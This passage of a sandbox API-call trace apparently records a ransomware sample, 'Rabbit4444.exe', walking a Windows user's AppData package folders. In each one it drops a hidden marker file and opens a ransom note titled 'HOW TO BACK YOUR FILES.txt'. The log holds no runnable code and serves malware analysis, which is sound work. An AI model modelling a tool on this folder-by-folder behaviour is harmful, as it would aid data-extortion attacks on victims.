lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.960] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.960] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.960] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.960] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd271dcb9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda67bf6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.960] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.961] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.961] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.961] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.961] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.961] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda67bf6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda67bf6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda8de49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.961] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.961] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.961] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda67bf6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda67bf6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda8de49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.961] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0060.961] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.961] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.961] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.961] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.962] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.962] CloseHandle (hObject=0x2a0) returned 1 [0060.962] CloseHandle (hObject=0x27c) returned 1 [0060.962] GetCurrentThreadId () returned 0xd98 [0060.962] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0060.962] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies" [0060.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0060.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0060.962] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies" [0060.962] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\" [0060.962] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0060.962] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.964] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.966] FlushFileBuffers (hFile=0x27c) returned 1 [0060.967] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.967] CloseHandle (hObject=0x27c) returned 1 [0060.967] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies") returned 90 [0060.967] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.968] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd271d40c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda8de49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0060.968] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.968] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.968] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.968] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.968] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd271d40c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda8de49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.968] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.968] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.968] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.968] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.968] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.968] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda8de49, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda8de49, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda8de49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.968] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.968] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.968] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda8de49, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda8de49, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda8de49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.968] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0060.968] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.968] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.969] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.969] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.969] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.969] CloseHandle (hObject=0x2a0) returned 1 [0060.969] CloseHandle (hObject=0x27c) returned 1 [0060.969] GetCurrentThreadId () returned 0xd98 [0060.969] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122208 [0060.969] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache" [0060.969] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0060.969] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0060.969] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache" [0060.969] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\" [0060.969] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0060.969] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.971] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.973] FlushFileBuffers (hFile=0x27c) returned 1 [0060.974] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.974] CloseHandle (hObject=0x27c) returned 1 [0060.975] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache") returned 88 [0060.975] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.975] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd271cb8e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda8de49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0060.975] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.975] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.975] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.975] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.975] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd271cb8e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda8de49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.975] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.975] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.975] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.975] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.975] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.975] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda8de49, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda8de49, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedab40e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.975] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.975] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.975] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda8de49, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda8de49, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedab40e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.975] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0060.975] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.975] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.976] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.976] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.976] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.976] CloseHandle (hObject=0x2a0) returned 1 [0060.976] CloseHandle (hObject=0x27c) returned 1 [0060.976] GetCurrentThreadId () returned 0xd98 [0060.976] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0060.977] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe" [0060.977] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113eb8 | out: hHeap=0xe0000) returned 1 [0060.977] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0060.977] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe" [0060.977] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\" [0060.977] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0060.977] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.983] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.985] FlushFileBuffers (hFile=0x27c) returned 1 [0060.986] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.986] CloseHandle (hObject=0x27c) returned 1 [0060.987] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe") returned 72 [0060.987] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.987] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8f25108d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedab40e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0060.987] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.987] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.987] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.987] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.987] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8f25108d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedab40e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.987] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.987] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.987] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.987] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.987] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.987] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedab40e8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedab40e8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedab40e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.987] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.988] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.988] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf68824d4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a34c4f0, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3a34c4f0, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0060.988] lstrcmpiW (lpString1="AC", lpString2="HOW TO 